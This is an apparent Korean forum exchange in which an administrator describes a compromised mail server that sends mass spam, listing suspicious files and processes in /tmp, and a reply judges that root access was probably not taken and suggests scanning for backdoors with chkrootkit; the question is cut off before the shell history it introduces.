아래의 내용만으로는

1. root 권한 획득 시도를 하지 않았고
2. 실제 웹해킹을 통해 메일 발송만을 목적으로 하였다면 굳이 root 권한이 필요하지 않은점

등을 볼때 root 권한까지는 빼앗기지 않은 것으로 보입니다.
일단 패치된 커널이라면 root 권한을 빼앗기지 않았을 것으로 생각하셔도 됩니다.

혹시 모르니 chkrootkit등으로 백도어등은 없는지 확인해 보시기 바랍니다.

증상

저희 메일서버를 통해 매일 엄창난 메일을 발송합니다.

1. /tmp 에 cgi(실행파일), cmd.gif(폴더:메일발송문서), bot.txt:chmod(perl 소스파일) 등이 존재합니다.

2. ps -aux 하면 ./cgi, sh -i, bindz 프로세스가 떠있습니다.

3. /tmp 에서 .bash_history를 확인하면 아래와 같이 있습니다.
